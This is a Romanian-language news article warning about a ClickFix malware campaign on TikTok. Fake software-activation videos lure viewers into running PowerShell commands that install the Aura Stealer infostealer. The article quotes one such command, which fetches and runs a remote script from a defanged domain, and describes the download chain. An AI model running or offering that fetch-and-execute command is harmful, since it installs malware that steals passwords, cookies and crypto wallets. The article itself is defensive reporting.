O nouă campanie de atacuri informatice folosește videoclipuri TikTok pentru a răspândi malware de tip „infostealer”, sub pretextul oferirii unor ghiduri gratuite de activare pentru programe populare precum Windows, Microsoft 365, Adobe Premiere, Photoshop sau Spotify Premium.
Experții în securitate cibernetică avertizează că acest tip de atac, cunoscut sub numele de ClickFix, câștigă rapid teren în rândul infractorilor digitali de pe TikTok.
Specialistul Xavier Mertens, de la ISC Handler, a observat că această campanie reia o metodă documentată inițial de Trend Micro în luna mai, potrivit Bleeping Computer.
Videoclipurile par să ofere instrucțiuni legitime de activare a software-ului, însă îi conving pe utilizatori să execute comenzi PowerShell periculoase, care duc la infectarea sistemului cu programe malițioase.
Cum funcționează atacurile ClickFix pe TikTok
Fiecare videoclip afișează o comandă scurtă, aparent inofensivă, și îi îndeamnă pe spectatori să o ruleze ca administrator în PowerShell, de exemplu: iex (irm slmgr[.]win/photoshop).
Adresele URL variază în funcție de programul imitat (de exemplu, „photoshop” este înlocuit cu „windows” în clipurile despre activarea Windows).
Odată executată, comanda stabilește o conexiune cu site-ul compromis slmgr[.]win, de unde descarcă și rulează un alt script PowerShell. Acesta, la rândul său, preia două fișiere executabile de pe pagini găzduite de Cloudflare.
Primul fișier, updater.exe, este o variantă a malware-ului Aura Stealer, cunoscut pentru capacitatea sa de a colecta date sensibile: parole salvate în browsere, cookie-uri de autentificare, portofele de criptomonede și acreditări din diverse aplicații. Toate aceste informații sunt apoi trimise către serverele controlate de atacatori.
Un al doilea fișier, source.exe, descarcă și compilează cod în memorie folosind compilatorul C# integrat în .NET (csc.exe), însă scopul final al acestui proces rămâne necunoscut.
Riscuri majore și recomandări de securitate
Utilizatorii care au executat astfel de comenzi ar trebui să presupună că toate datele de autentificare au fost compromise. Experții recomandă schimbarea imediată a parolelor pentru toate conturile online și, acolo unde este posibil, activarea autentificării în doi pași.
Atacurile ClickFix au devenit tot mai frecvente în ultimul an, fiind folosite pentru distribuirea unor familii diverse de malware, inclusiv cele implicate în campanii de ransomware și furt de criptomonede.
Pentru a evita compromiterea sistemului, specialiștii avertizează: nu copiați niciodată text sau comenzi dintr-un videoclip ori site web pentru a le rula direct în PowerShell, Command Prompt, File Explorer, Terminalul macOS sau shell-urile Linux. Oricât de convingătoare ar părea sursa, un singur click greșit poate expune întregul sistem unei breșe de securitate.